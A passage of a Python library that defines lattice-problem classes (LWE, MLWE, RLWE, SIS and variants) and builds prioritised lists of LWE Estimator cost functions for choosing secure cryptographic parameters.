:param secret_distribution: secret distribution (instance of subclass of :py:mod:`lattice_parameter_estimation.distributions.Gaussian` or :py:mod:`lattice_parameter_estimation.distributions.Uniform`)
:param error_distribution: secret distribution (instance of subclass of :py:mod:`lattice_parameter_estimation.distributions.Gaussian` or :py:mod:`lattice_parameter_estimation.distributions.Uniform`)
:param variant: for internal use to distinguish variants
:param label: short string to refer to describe the problem name, e.g. ``"LWE-Regev"``
"""
# check soundness of parameters
if not n or not q or not m or n < 0 or q < 0 or m < 0:
raise ValueError("Parameters not specified correctly")
if label is None:
label = variant + str(self._counter)
self._counter += 1
self.label = label
self.variant = variant
self.n = n
self.q = q
self.m = m
self.secret_distribution = secret_distribution
self.error_distribution = error_distribution
def get_estimate_algorithms(self, config: algorithms.Configuration):
r"""
Compute list of estimate functions from the LWE Estimator :cite:`APS15` on the LWE instance according to the attack configuration.
The priorities are assigned as follows:
.. list-table:: Algorithm Priorities
:header-rows: 1
* - Algorithm
- Priority
- Comment
* - mitm
- 5
- fastest, high cost estimate, as prefilter
* - primal-usvp
- 10
- fast, low cost estimates
* - dual
- 20
- fast, estimates may be slightly higher than primal-usvp
* - dual-no-lll
- 30
- fast, estimates may be slightly higher than dual
* - bkw-coded
- 90
- slow, somtimes very low cost estimate (for small stddev), does not always yield results
* - primal-decode
- 100
- slow, estimates often higher than faster algorithms
* - arora-gb
- 200
- extremely slow, often higher estimates, does not always yield results
.. figure:: ../tests_for_optimization/algorithm_runtime_cost/LWE_plot_Regev_long.png
:align: center
:figclass: align-center
LWE instance with parameters as in :cite:`Reg05`
.. figure:: ../tests_for_optimization/algorithm_runtime_cost/LWE_plot_Regev_long_small_n.png
:align: center
:figclass: align-center
LWE instance with parameters as in :cite:`Reg05` for small :math:`n`
.. figure:: ../tests_for_optimization/algorithm_runtime_cost/LWE_plot_long_small.png
:align: center
:figclass: align-center
LWE instance with :math:`\sigma=2.828,\; m=\infty, \; n < q < 2n`
:param config: instance of :py:mod:`lattice_parameter_estimation.algorithms.Configuration`
:returns: list of algorithms, e.g. ``[{"algname": "a1", "cname": "c1", "algf": f, "prio": 0, "cprio": 0, "inst": "LWE"}]`` where "prio" is the priority value of the algorithm (lower values have shorted estimated runtime) and "cprio" of the cost model, with lower expected cost estimate for lower priorities
"""
if not isinstance(config, algorithms.Configuration):
raise ValueError("config must be instance of algorithms.Configuration")
secret_distribution = self.secret_distribution._convert_for_lwe_estimator()
alpha = RR(self.error_distribution.get_alpha(q=self.q, n=self.n))
# TODO: if secret is normal, but doesn't follow noise distribution, not supported by estimator => convert to uniform?
if (
secret_distribution == "normal"
and self.secret_distribution.get_alpha(q=self.q, n=self.n) != alpha
):
raise NotImplementedError(
"If secret distribution is Gaussian it must follow the error distribution. Differing Gaussians not supported by LWE Estimator at the moment."
) # TODO: perhaps change
cost_models = config.reduction_cost_models()
algs = []
# Choose algorithms. Similar to estimate_lwe function in estimator.py
for reduction_cost_model in cost_models:
cost_model = cost_model = reduction_cost_model["cost_model"]
success_probability = reduction_cost_model["success_probability"]
cname = reduction_cost_model["name"]
cprio = reduction_cost_model["prio"]
if "usvp" in config.algorithms:
if est.SDis.is_sparse(secret_distribution) and est.SDis.is_ternary(
secret_distribution
):
# Try guessing secret entries via drop_and_solve
algs.append(
{
"algname": "primal-usvp-drop",
"cname": cname,
"algf": partial(
est.drop_and_solve,
est.primal_usvp,
postprocess=False,
decision=False,
rotations=False,
reduction_cost_model=cost_model,
n=self.n,
alpha=alpha,
q=self.q,
m=self.m,
secret_distribution=secret_distribution,
success_probability=success_probability,
),
"prio": 10,
"cprio": cprio,
"inst": self.variant,
}
)
else: # TODO: can drop and solve yield worse results than standard decode?
algs.append(
{
"algname": "primal-usvp",
"cname": cname,
"algf": partial(
est.primal_usvp,
reduction_cost_model=cost_model,
n=self.n,
alpha=alpha,
q=self.q,
m=self.m,
secret_distribution=secret_distribution,
success_probability=success_probability,
),
"prio": 10,
"cprio": cprio,
"inst": self.variant,
}
)
if "dual" in config.algorithms:
if est.SDis.is_ternary(
secret_distribution
): # TODO can drop and solve yield worse results than standard?
# Try guessing secret entries via drop_and_solve
algs.append(
{
"algname": "dual-scale-drop",
"cname": cname,
"algf": partial(
est.drop_and_solve,
est.dual_scale,
postprocess=True,
rotations=False,
use_lll=True,
reduction_cost_model=cost_model,
n=self.n,
alpha=alpha,
q=self.q,
m=self.m,
secret_distribution=secret_distribution,
success_probability=success_probability,
),
"prio": 20,
"cprio": cprio,
"inst": self.variant,
}
)
elif est.SDis.is_small(secret_distribution):
algs.append(
{
"algname": "dual-scale",
"cname": cname,
"algf": partial(
est.dual_scale,
use_lll=True,
reduction_cost_model=cost_model,
n=self.n,
alpha=alpha,
q=self.q,
m=self.m,
secret_distribution=secret_distribution,
success_probability=success_probability,
),
"prio": 20,
"cprio": cprio,
"inst": self.variant,
}
)
else:
algs.append(
{
"algname": "dual",
"cname": cname,
"algf": partial(
est.dual,
reduction_cost_model=cost_model,
n=self.n,
alpha=alpha,
q=self.q,
m=self.m,
secret_distribution=secret_distribution,
success_probability=success_probability,
),
"prio": 20,
"cprio": cprio,
"inst": self.variant,
}
)
if "dual-without-lll" in config.algorithms:
if est.SDis.is_ternary(
secret_distribution
): # TODO can drop and solve yield worse results than standard?
# Try guessing secret entries via drop_and_solve
algs.append(
{
"algname": "dual-scale-drop-without-lll",
"cname": cname,
"algf": partial(
est.drop_and_solve,
est.dual_scale,
postprocess=True,
rotations=False,
use_lll=False,
reduction_cost_model=cost_model,
n=self.n,
alpha=alpha,
q=self.q,
m=self.m,
secret_distribution=secret_distribution,
success_probability=success_probability,
),
"prio": 30,
"cprio": cprio,
"inst": self.variant,
}
)
elif est.SDis.is_small(secret_distribution):
algs.append(
{
"algname": "dual-scale-without-lll",
"cname": cname,
"algf": partial(
est.dual_scale,
use_lll=False,
reduction_cost_model=cost_model,
n=self.n,
alpha=alpha,
q=self.q,
m=self.m,
secret_distribution=secret_distribution,
success_probability=success_probability,
),
"prio": 30,
"cprio": cprio,
"inst": self.variant,
}
)
elif (
"dual" not in config.algorithms
): # else this algorithm will be run twice
algs.append(
{
"algname": "dual-without-lll",
"cname": cname,
"algf": partial(
est.dual,
reduction_cost_model=cost_model,
n=self.n,
alpha=alpha,
q=self.q,
m=self.m,
secret_distribution=secret_distribution,
success_probability=success_probability,
),
"prio": 30,
"cprio": cprio,
"inst": self.variant,
}
)
if "decode" in config.algorithms:
# TODO: Runtime much worse than primal-usvp, may yield better values for small n (Regev scheme n < 256?)
# TODO: Could be used when early termination is on perhaps, then it would only be called when all other tests succeed?
if est.SDis.is_sparse(secret_distribution) and est.SDis.is_ternary(
secret_distribution
):
algs.append(
{
"algname": "primal-decode-drop",
"cname": cname,
"algf": partial(
est.drop_and_solve,
est.primal_decode,
postprocess=False,
decision=False,
rotations=False,
reduction_cost_model=cost_model,
n=self.n,
alpha=alpha,
q=self.q,
m=self.m,
secret_distribution=secret_distribution,
success_probability=success_probability,
),
"prio": 100,
"cprio": cprio,
"inst": self.variant,
}
)
else: # TODO: can drop and solve yield worse results than standard decode?
algs.append(
{
"algname": "primal-decode",
"cname": cname,
"algf": partial(
est.primal_decode,
reduction_cost_model=cost_model,
n=self.n,
alpha=alpha,
q=self.q,
m=self.m,
secret_distribution=secret_distribution,
success_probability=success_probability,
),
"prio": 100,
"cprio": cprio,
"inst": self.variant,
}
)
# attacks without reduction cost model
if (
"mitm" in config.algorithms
): # estimates are very bad but very fast, so no need to exclude
algs.append(
{
"algname": "mitm",
"cname": "",
"algf": partial(
est.mitm,
n=self.n,
alpha=alpha,
q=self.q,
m=self.m,
secret_distribution=secret_distribution,
success_probability=success_probability,
),
"prio": 5,
"cprio": 5,
"inst": self.variant,
}
)
if (
"coded-bkw" in config.algorithms
): # sometimes slow but may yield good results
algs.append(
{
"algname": "coded-bkw",
"cname": "",
"algf": partial(
est.bkw_coded,
n=self.n,
alpha=alpha,
q=self.q,
m=self.m,
secret_distribution=secret_distribution,
success_probability=success_probability,
),
"prio": 90,
"cprio": 0,
"inst": self.variant,
}
)
if "arora-gb" in config.algorithms: # slow and bad results
if est.SDis.is_sparse(secret_distribution) and est.SDis.is_small(
secret_distribution
):
algs.append(
{
"algname": "arora-gb-drop",
"cname": "",
"algf": partial(
est.drop_and_solve,
est.arora_gb,
rotations=False,
n=self.n,
alpha=alpha,
q=self.q,
m=self.m,
secret_distribution=secret_distribution,
success_probability=success_probability,
),
"prio": 200,
"cprio": 0,
"inst": self.variant,
}
)
elif secret_distribution != "normal" and est.SDis.is_small(
secret_distribution
): # switch_modulus does not work for normal sec_dis
algs.append(
{
"algname": "arora-gb-switch-modulus",
"cname": "",
"algf": partial(
est.switch_modulus,
est.arora_gb,
n=self.n,
alpha=alpha,
q=self.q,
m=self.m,
secret_distribution=secret_distribution,
success_probability=success_probability,
),
"prio": 200,
"cprio": 0,
"inst": self.variant,
}
)
else:
algs.append(
{
"algname": "arora-gb",
"cname": "",
"algf": partial(
est.arora_gb,
n=self.n,
alpha=alpha,
q=self.q,
m=self.m,
secret_distribution=secret_distribution,
success_probability=success_probability,
),
"prio": 200,
"cprio": 0,
"inst": self.variant,
}
)
return algs
def to_LWE(self):
return self
def __str__(self):
# TODO
return f"LWE [n={str(self.n)}, q={str(self.q)}, m={str(self.m)}, sec_dis={str(self.secret_distribution._convert_for_lwe_estimator())}, err_dis={str(float(self.error_distribution.get_alpha(q=self.q, n=self.n)))}]"
class MLWE(LWE):
"""
Module Learning with Errors (MLWE) problem class used to create a list of algorithms from LWE Estimator :cite:`APS15` for cost estimation.
"""
_counter = 1
def __init__(
self,
n,
d,
q,
m,
secret_distribution: distributions.Distribution,
error_distribution: distributions.Distribution,
label=None,
variant="MLWE",
):
"""
:param n: degree of ring polynomial
:param d: rank of module
:param q: modulus
:param m: number of samples
:param secret_distribution: secret distribution (instance of subclass of :py:mod:`lattice_parameter_estimation.distributions.Gaussian` or :py:mod:`lattice_parameter_estimation.distributions.Uniform`)
:param error_distribution: secret distribution (instance of subclass of :py:mod:`lattice_parameter_estimation.distributions.Gaussian` or :py:mod:`lattice_parameter_estimation.distributions.Uniform`)
:param variant: for internal use to distinguish variants
:param label: short string to refer to describe the problem name, e.g. ``"LWE-Regev"``
"""
# check soundness of parameters
if not n or not d or not q or not m or n < 0 or d < 0 or q < 0 or m < 0:
raise ValueError("Parameters not specified correctly")
if label is None:
label = variant + str(self._counter)
self._counter += 1
self.label = label
self.variant = variant
self.n = n
self.d = d
self.q = q
self.m = m
self.secret_distribution = secret_distribution
self.error_distribution = error_distribution
def get_estimate_algorithms(self, config: algorithms.Configuration):
r"""
Compute list of estimate functions on the MLWE instance according to the attack configuration.
:param config: instance of :py:mod:`lattice_parameter_estimation.algorithms.Configuration`
:returns: list of algorithms, e.g. ``[{"algname": "a1", "cname": "c1", "algf": f, "prio": 0, "cprio": 0, "inst": "MLWE"}]`` where "prio" is the priority value of the algorithm (lower values have shorted estimated runtime)
"""
if not isinstance(config, algorithms.Configuration):
raise ValueError("config must be instance of algorithms.Configuration")
lwe = LWE(
n=self.n * self.d,
q=self.q,
m=self.m * self.n,
secret_distribution=self.secret_distribution,
error_distribution=self.error_distribution,
variant="MLWE",
label=self.label,
)
return lwe.get_estimate_algorithms(config=config)
def to_LWE(self):
"""
:returns: LWE instance with parameters :math:`n=n \cdot d` and :math:`m=m \cdot n`
"""
return LWE(
n=self.n * self.d,
q=self.q,
m=self.m * self.n,
secret_distribution=self.secret_distribution,
error_distribution=self.error_distribution,
variant="MLWE",
label=self.label,
)
def __str__(self):
return (
"MLWE instance with parameters (n="
+ str(self.n)
+ ", d="
+ str(self.d)
+ ", q="
+ str(self.q)
+ ", m="
+ str(self.m)
+ ", secret_distribution="
+ str(self.secret_distribution._convert_for_lwe_estimator())
+ ", error_distribution="
+ str(self.error_distribution._convert_for_lwe_estimator())
+ ")"
)
class RLWE(LWE):
"""
Ring Learning with Errors (RLWE) problem class used to create a list of algorithms from LWE Estimator :cite:`APS15` for cost estimation.
"""
_counter = 1
def __init__(
self,
n,
q,
m,
secret_distribution: distributions.Distribution,
error_distribution: distributions.Distribution,
variant="RLWE",
label=None,
):
"""
:param n: degree of ring polynomial
:param q: modulus
:param m: number of samples
:param secret_distribution: secret distribution (subclass of :py:mod:`lattice_parameter_estimation.distributions.Gaussian` or :py:mod:`lattice_parameter_estimation.distributions.Uniform`)
:param error_distribution: secret distribution (subclass of :py:mod:`lattice_parameter_estimation.distributions.Gaussian` or :py:mod:`lattice_parameter_estimation.distributions.Uniform`)
:param config: instance of :py:mod:`lattice_parameter_estimation.algorithms.Configuration`
:param variant: for internal use to distinguish variants
:param label: short string to refer to describe the problem name, e.g. ``"LWE-Regev"``
"""
if not n or not q or not m or n < 0 or q < 0 or m < 0:
raise ValueError("Parameters not specified correctly")
if label is None:
label = variant + str(self._counter)
self._counter += 1
self.label = label
self.variant = variant
## interpret coefficients of elements of R_q as vectors in Z_q^n [ACD+18, p. 6] TODO: check
self.n = n
self.q = q
self.m = m
self.secret_distribution = secret_distribution
self.error_distribution = error_distribution
def get_estimate_algorithms(self, config: algorithms.Configuration):
r"""
Compute list of estimate functions on the RLWE instance according to the attack configuration by interpreting the coefficients of elements of :math:`\mathcal{R}_q` as vectors in :math:`\mathbb{Z}_q^n` as in :cite:`ACDDPPVW18`, p. 6.
:param config: instance of :py:mod:`lattice_parameter_estimation.algorithms.Configuration`
:returns: list of algorithms, e.g. ``[{"algname": "a1", "cname": "c1", "algf": f, "prio": 0, "cprio": 0, "inst": "RLWE"}]`` where "prio" is the priority value of the algorithm (lower values have shorted estimated runtime)
"""
if not isinstance(config, algorithms.Configuration):
raise ValueError("config must be instance of algorithms.Configuration")
lwe = LWE(
n=self.n,
q=self.q,
m=self.m * self.n,
secret_distribution=self.secret_distribution,
error_distribution=self.error_distribution,
variant="RLWE",
label=self.label,
)
return lwe.get_estimate_algorithms(config=config)
def to_LWE(self):
"""
:returns: LWE instance with parameters :math:`n=n` and :math:`m=m \cdot n`
"""
return LWE(
n=self.n,
q=self.q,
m=self.m * self.n,
secret_distribution=self.secret_distribution,
error_distribution=self.error_distribution,
variant="RLWE",
label=self.label,
)
def __str__(self):
return (
"RLWE instance with parameters (n="
+ str(self.n)
+ ", q="
+ str(self.q)
+ ", m="
+ str(self.m)
+ ", secret_distribution="
+ str(self.secret_distribution._convert_for_lwe_estimator())
+ ", error_distribution="
+ str(self.error_distribution._convert_for_lwe_estimator())
+ ")"
)
class StatisticalGaussianMLWE:
r"""
Statistically secure MLWE over Gaussian distribution according to :cite:`LPR13`.
Mapping of parameters in paper to use here:
============================= =========== ========================================
Parameters in :cite:`LPR13` Use Here Represents
============================= =========== ========================================
:math:`q` :math:`q` modulus
:math:`l` :math:`m+d` width of matrix :math:`\mathbf{A}`
:math:`k` :math:`m` height of matrix :math:`\mathbf{A}`
:math:`n` :math:`n` degree of ring polynomial
============================= =========== ========================================
Then Corollary 7.5 combined with Theorem 7.4 in :cite:`LPR13` reads as follows:
Let :math:`\mathcal{R}` be the ring of integers in the :math:`m'`th cyclotomic number field :math:`K` of degree :math:`n`, and :math:`q \geq 2` an integer.
For positive integers :math:`m \leq m + d \leq \text{poly}(n)`, let :math:`\mathbf{A} = [ \mathbf{I}_{[m]} \mid \bar{\mathbf{A}}] \in (\mathcal{R}_q)^{[m] \times [m+d]}`, where :math:`\mathbf{I}_{[m]} \in (\mathcal{R}_q)^{[m] \times [m]}` is the identity matrix and :math:`\bar{\mathbf{A}} \in (\mathcal{R}_q)^{[m] \times [d]}` is uniformly random.
Then with probability :math:`1 - 2^{-\Omega(n)}` over the choice of :math:`\bar{\mathbf{A}}`, the distribution of :math:`\mathbf{A}\mathbf{x} \in (\mathcal{R}_q)^{[m]}` where each coordinate of :math:`\mathbf{x} \in (\mathcal{R}_q)^{[m+d]}` is chosen from a discrete Gaussian distribution of parameter :math:`s > 2n \cdot q^{m / (m+d) + 2/(n (m+d))}` over :math:`\mathcal{R}`, satisfies that the probability of each of the :math:`q^{n m}` possible outcomes is in the interval :math:`(1 \pm 2^{-\Omega(n)}) q^{-n }` (and in particular is within statistical distance :math:`2^{-\Omega(n)}` of the uniform distribution over :math:`(\mathcal{R}_q)^{[m]}`).
:ivar min_sigma: minimum :math:`\sigma` (standard deviation) required for statistically secure MLWE
:ivar sec: set to parameter sec if sec is specified in constructor, else set to n
"""
def __init__(self, n, d, q, m, sec=None):
"""
:param n: degree of ring polynomial
:param d: rank of module
:param q: modulus
:param m: number of samples
:param sec: optional security parameter to ensure that n >= sec and for Gaussian conversion
"""
# TODO check parameters
if sec and sec > n:
raise ValueError(
"sec parameter must be greater than degree of ring polynomial n. Given parameters are not statistically secure."
)
self.n = n
self.d = d
self.q = q
self.m = m
self.sec = sec
min_s = RR(2 * n * q ** (m / (m + d) + 2 / (n * (m + d))))
self.min_sigma = est.stddevf(min_s)
if self.sec:
self.sec = sec # we choose sec, not n as we possibly need it for Gaussian to bound conversion
else:
self.sec = n
def get_secret_distribution_min_width(self):
# TODO: auch bei StatisticalMSIS
return distributions.GaussianSigma(
self.min_sigma, q=self.q, componentwise=True, sec=self.sec
)
class StatisticalGaussianMatrixMLWE(StatisticalGaussianMLWE):
r"""
Statistically secure MLWE over Gaussian distribution according to :cite:`LPR13`.
For more details, see :class:`StatisticalGaussianMLWE`.
:ivar min_sigma: minimum :math:`\sigma` (standard deviation) required for statistically secure MLWE
:ivar sec: set to parameter sec if sec is specified in constructor, else set to n
"""
def __init__(self, n, q, width, height, sec=None):
r"""
:param n: degree of ring polynomial
:param q: modulus
:param width: width of matrix :math:`\mathbf{A}`
:param height: height of matrix :math:`\mathbf{A}`
:param sec: optional security parameter to ensure that n >= sec and for Gaussian conversion
"""
super().__init__(n=n, q=q, d=width - height, m=height, sec=sec)
class StatisticalGaussianRLWE(StatisticalGaussianMLWE):
r"""
Statistically secure RLWE over Gaussian distribution with invertible elements :cite:`LPR13`.
For details, see :class:`StatisticalGaussianMLWE` with module dimension :math:`d=1`.
:ivar min_sigma: minimum :math:`\sigma` (standard deviation) required for statistically secure MLWE
:ivar sec: set to parameter sec if sec is specified in constructor, else set to n
"""
def __init__(self, n, q, m, sec=None):
"""
:param n: degree of ring polynomial
:param q: modulus
:param m: number of samples
:param sec: optional security parameter to ensure that n >= sec and for Gaussian conversion
"""
super().__init__(n=n, d=1, q=q, m=m, sec=sec)
class StatisticalUniformMLWE:
r"""
Statistically secure MLWE over Uniform distribution with invertible elements :cite:`BDLOP18`.
MLWE problem instance where samples :math:`(\mathbf{A}', h_{\mathbf{A}'}(y))` are within statistical distance :math:`2^{-\texttt{sec}}` of :math:`(\mathbf{A}', \mathbf{u})` for uniform :math:`\mathbf{u}`.
Mapping of parameters in paper to use here:
============================= =========== ============================================================
Parameters in :cite:`BDLOP18` Use Here Represents
============================= =========== ============================================================
:math:`q` :math:`q` modulus
:math:`k` :math:`m+d` width of matrix :math:`[ \mathbf{I}_n \; \mathbf{A}' ]`
:math:`n` :math:`m` height of matrix :math:`[ \mathbf{I}_n \; \mathbf{A}' ]`
:math:`d` :math:`d_2` variable
:math:`N` :math:`n` degree of ring polynomial
============================= =========== ============================================================
Lemma (:cite:`BDLOP18` Lemma 4): Let :math:`1 < d_2 < n` be a power of 2. If :math:`q` is a prime congruent to :math:`2d_2 + 1 \;(\text{mod } 4d_2)` and
.. math::
q^{m/(m+d)} \cdot 2^{2 \texttt{sec}/((m+d)\cdot n)} \leq 2 \beta < \frac{1}{\sqrt{d_2}} \cdot q^{1/d_2}
then any (all-powerful) algorithm :math:`\mathcal{A}` has advantage at most :math:`2^{-\texttt{sec}}` in solving :math:`\text{DKS}_{m,m+d,\beta}^\infty`, where :math:`\text{DKS}^\infty` is the decisional knapsack problem in :math:`\ell_\infty`-norm.
Hence, we have:
.. math::
\beta_{min} = \frac{q^{m/(m+d)} \cdot 2^{2 \texttt{sec}/((m+d)\cdot n)}}{2}
\beta_{max} = \frac{1}{2\sqrt{d_2}} \cdot q^{1/d_2} - 1
:ivar min_beta: :math:`\beta_{min}`, instance of :py:mod:`lattice_parameter_estimation.norm.Lp` with `p=oo`
:ivar max_beta: :math:`\beta_{max}` , instance of :py:mod:`lattice_parameter_estimation.norm.Lp` with `p=oo`
"""
def __init__(self, sec, n, d, q, m, d_2=None):
r"""
:param sec: required bit security of MLWE instance
:param n: degree of ring polynomial
:param d: rank of module (width of matrix :math:`\mathbf{A}'` in :cite:`BDLOP18`)
:param q: modulus, must be prime congruent to :math:`2d_2 + 1 \;(\text{mod } 4d_2)`
:param m: number of samples (height of matrix :math:`\mathbf{A}'` in :cite:`BDLOP18`)
:param d_2: :math:`1 < d_2 < N` and :math:`d_2` is a power of 2
"""
if d_2 is None:
d_2 = StatisticalUniformMLWE.find_d(q, n)
# TODO: check prerequisites?
self.n = n
self.q = q
self.m = m
self.d = d
self.d_2 = d_2
min_beta = RR(q ** (m / (m + d)) * 2 ** (2 * sec / ((m + d) * n)) / 2)
max_beta = RR(1 / (2 * sqrt(d_2)) * q ** (1 / d_2)) - 1
if min_beta >= max_beta:
logger.warning(
"Could not find (min_beta, max_beta) such that min_beta < max_beta."
)
self.min_beta = norm.Lp(min_beta, oo, n * d)
self.max_beta = norm.Lp(max_beta, oo, n * d)
def get_beta_bounds(self):
"""
:returns: tuple (min_beta, max_beta), betas are instances of :py:mod:`lattice_parameter_estimation.norm.Lp`
"""
return (self.min_beta, self.max_beta)
def find_d(q, n):
r"""
Find :math:`d` that is a power of 2 and satisfies :math:`1 < d < n` such that the prime :math:`q` is congruent to :math:`2d_2 + 1 \;(\text{mod } 4d_2)`
:param q: prime
:param n: upper bound of d (degree of ring polynomial)
"""
d = 2
while d < n:
if (q % (4 * d)) == (2 * d + 1):
return d
else:
d *= 2
raise ValueError(
"Could not find d such that 1 < d < n power of 2 and q congruent to 2d + 1 (mod 4d). q="
+ str(q)
+ ", n="
+ str(n)
+ ". Try again or call constructor with d_2."
)
class StatisticalUniformMatrixMLWE(StatisticalUniformMLWE):
r"""
Statistically secure MLWE over Uniform distribution with invertible elements :cite:`BDLOP18`.
For more details, see :class:`StatisticalUniformMLWE`.
:ivar min_beta: :math:`\beta_{min}`
:ivar max_beta: :math:`\beta_{max}`
"""
def __init__(self, sec, n, q, width, height, d_2=None):
r"""
:param n: degree of ring polynomial
:param q: modulus
:param width: width of matrix :math:`\mathbf{A}`
:param height: height of matrix :math:`\mathbf{A}`
:param d_2: :math:`1 < d_2 < N` and :math:`d_2` is a power of 2
:param sec: optional security parameter to ensure that n >= sec and for Gaussian conversion
"""
super().__init__(n=n, sec=sec, q=q, d=width - height, m=height, d_2=d_2)
class StatisticalUniformRLWE(StatisticalUniformMLWE):
r"""
Statistically secure RLWE over Uniform distribution with invertible elements :cite:`BDLOP18`.
For details, see :class:`StatisticalUniformMLWE` with module dimension :math:`d=1`.
:ivar min_beta: :math:`\beta_{min}`
:ivar max_beta: :math:`\beta_{max}`
"""
def __init__(self, sec, n, q, m, d_2=None):
r"""
:param sec: required bit security of MLWE instance
:param n: degree of ring polynomial
:param q: modulus, must be prime congruent to :math:`2d_2 + 1 \;(\text{mod } 4d_2)`
:param m: number of samples (height of matrix :math:`\mathbf{A}'` in :cite:`BDLOP18`)
:param d_2: :math:`1 < d_2 < N` and :math:`d_2` is a power of 2
"""
super().__init__(sec=sec, n=n, d=1, q=q, m=m, d_2=d_2)
## SIS and its variants ##
class SIS(BaseProblem):
"""
Short Integer Solution (SIS) problem class used to create a list of algorithms from for cost estimation.
"""
_counter = 1
def __init__(self, n, q, m, bound: norm.BaseNorm, variant="SIS", label=None):
"""
:param q: modulus
:param n: secret dimension
:param m: number of samples
:param bound: upper bound on norm of secret distribution, must be instance of subclass of :py:mod:`lattice_parameter_estimation.norm.BaseNorm`. TODO
:param variant: for internal use to distinguish variants
:param label: short string to refer to describe the problem name, e.g. ``"LWE-Regev"``
"""
if not n or not q or not m or n < 0 or q < 0 or m < 0:
raise ValueError("Parameters not specified correctly")
if label is None:
label = variant + str(self._counter)
self._counter += 1
self.label = label
self.variant = variant
self.q = q
self.n = n
self.m = m
self.bound = bound
def get_estimate_algorithms(self, config: algorithms.Configuration):
r"""
Compute list of estimate functions on the SIS instance according to the attack configuration.
The priorities are assigned as follows:
.. list-table:: Algorithm Priorities TODO
:header-rows: 1
* - Algorithm
- Priority
- Comment
* - lattice-reduction
- 1
- fastest, low cost estimates
* - lattice-reduction-rs
- 2
- same results as lattice-reduction
* - combinatorial
- 10
- fast, often higher cost results
* - combinatorial-conservative
- 9
- fast, often higher cost results, slightly better than combinatorial
.. figure:: ../tests_for_optimization/algorithm_runtime_cost/SIS_plot_small.png
:align: center
:figclass: align-center
SIS instance with :math:`n^2 < q < 2n^2, \; m = 2n \sqrt{n \log q}, \; s = 2 \sqrt{n \log q}`
:param config: instance of :py:mod:`lattice_parameter_estimation.algorithms.Configuration`
:returns: list of algorithms, e.g. ``[{"algname": "a1", "cname": "c1", "algf": f, "prio": 0, "cprio": 0, "inst": "SIS"}]`` where "prio" is the priority value of the algorithm (lower values have shorted estimated runtime)
"""
if not isinstance(config, algorithms.Configuration):
raise ValueError("config must be instance of algorithms.Configuration")
cost_models = config.reduction_cost_models()
algs = []
for reduction_cost_model in cost_models:
cost_model = reduction_cost_model["cost_model"]
cname = reduction_cost_model["name"]
if "reduction-rs" in config.algorithms:
# TODO: implement drop_and_solve and scale variants
algs.append(
{
"algname": "lattice-reduction-rs",
"cname": cname,
"algf": partial(
algorithms.SIS.lattice_reduction_rs,
n=self.n,
beta=self.bound.to_L2(self.n).value,
q=self.q,
success_probability=reduction_cost_model[
"success_probability"
],
m=self.m,
reduction_cost_model=cost_model,
),
"prio": 2,
"cprio": reduction_cost_model["prio"],
"inst": self.variant,
}
)
if "reduction" in config.algorithms:
algs.append(
{
"algname": "lattice-reduction",
"cname": cname,
"algf": partial(
algorithms.SIS.lattice_reduction,
n=self.n,
beta=self.bound.to_L2(self.n).value,
q=self.q,
success_probability=reduction_cost_model[
"success_probability"
],
m=self.m,
reduction_cost_model=cost_model,
),
"prio": 1,
"cprio": reduction_cost_model["prio"],
"inst": self.variant,
}
)
if "combinatorial" in config.algorithms:
algs.append(
{
"algname": "combinatorial",
"cname": "",
"algf": partial(
algorithms.SIS.combinatorial,
n=self.n,
q=self.q,
m=self.m,
bound=self.bound.to_Loo(self.n).value,
),
"prio": 10,
"cprio": 0,
"inst": self.variant,
}
)
if "combinatorial_conservative" in config.algorithms:
algs.append(
{
"algname": "combinatorial-cons",
"cname": "",
"algf": partial(
algorithms.SIS.combinatorial_conservative,
n=self.n,
q=self.q,
m=self.m,
bound=self.bound.to_Loo(self.n).value,
),
"prio": 9,
"cprio": 0,
"inst": self.variant,
}
)
return algs
def to_SIS(self):
return self
def __str__(self):
return f"SIS [n={str(self.n)}, q={str(self.q)}, m={str(self.m)}, bound ({type(self.bound).__name__})={str(float(self.bound.value))}]"
class MSIS(SIS):
"""
Module Short Integer Solution (MSIS) problem class used to create a list of algorithms from for cost estimation.
"""
_counter = 1
def __init__(self, n, d, q, m, bound: norm.BaseNorm, variant="MSIS", label=None):
"""
:param n: degree of ring polynomial
:param d: rank of module
:param q: modulus
:param m: number of samples
:param bound: upper bound on norm of solution, must be subclass of :py:mod:`lattice_parameter_estimation.norm.BaseNorm`
:param variant: for internal use to distinguish variants
:param label: short string to refer to describe the problem name, e.g. ``"LWE-Regev"``
"""
if not n or not d or not q or not m or n < 0 or d < 0 or q < 0 or m < 0:
raise ValueError("Parameters not specified correctly")
if label is None:
label = variant + str(self._counter)
self._counter += 1
self.label = label
self.variant = variant
self.n = n
self.d = d
self.q = q
self.m = m
self.bound = bound
def get_estimate_algorithms(self, config: algorithms.Configuration):
r"""
Compute list of estimate functions on the MSIS instance according to the attack configuration.
:param config: instance of :py:mod:`lattice_parameter_estimation.algorithms.Configuration`
:returns: list of algorithms, e.g. ``[{"algname": "a1", "cname": "c1", "algf": f, "prio": 0, "cprio": 0, "inst": "MSIS"}]`` where "prio" is the priority value of the algorithm (lower values have shorted estimated runtime)
"""
if not isinstance(config, algorithms.Configuration):
raise ValueError("config must be instance of algorithms.Configuration")
sis = SIS(
n=self.n * self.d,
q=self.q,
m=self.m * self.n,
bound=self.bound,
variant="MSIS",
label=self.label,
)
return sis.get_estimate_algorithms(config=config)
def to_SIS(self):
"""
:returns: SIS instance with dimension :math:`n=n \cdot d` and :math:`m=m \cdot n`
"""
return SIS(
n=self.n * self.d,
q=self.q,
m=self.m * self.n,
bound=self.bound,
variant="MSIS",
label=self.label,
)
def __str__(self):
return f"MSIS [n={str(self.n)}, d={str(self.d)}, q={str(self.q)}, m={str(self.m)}, bound ({type(self.bound).__name__})={str(float(self.bound.value))}]"
class RSIS(SIS):
"""
Ring Short Integer Solution (RSIS) problem class used to create a list of algorithms from for cost estimation.
"""
_counter = 1
def __init__(self, n, q, m, bound: norm.BaseNorm, variant="RSIS", label=None):
"""
:param q: modulus
:param n: degree of ring polynomial
:param m: number of samples
:param bound: upper bound on norm of solution, must be subclass of :py:mod:`lattice_parameter_estimation.norm.BaseNorm`
:param variant: for internal use to distinguish variants
:param label: short string to refer to describe the problem name, e.g. ``"LWE-Regev"``
"""
## We interpret the coefficients of elements of R_q as vectors in Z_q^n [ACD+18, p. 6]
if not n or not q or not m or n < 0 or q < 0 or m < 0:
raise ValueError("Parameters not specified correctly")
if label is None:
label = variant + str(self._counter)
self._counter += 1
self.label = label
self.variant = variant
self.n = n
self.q = q
self.m = m
self.bound = bound
def get_estimate_algorithms(self, config: algorithms.Configuration):
r"""
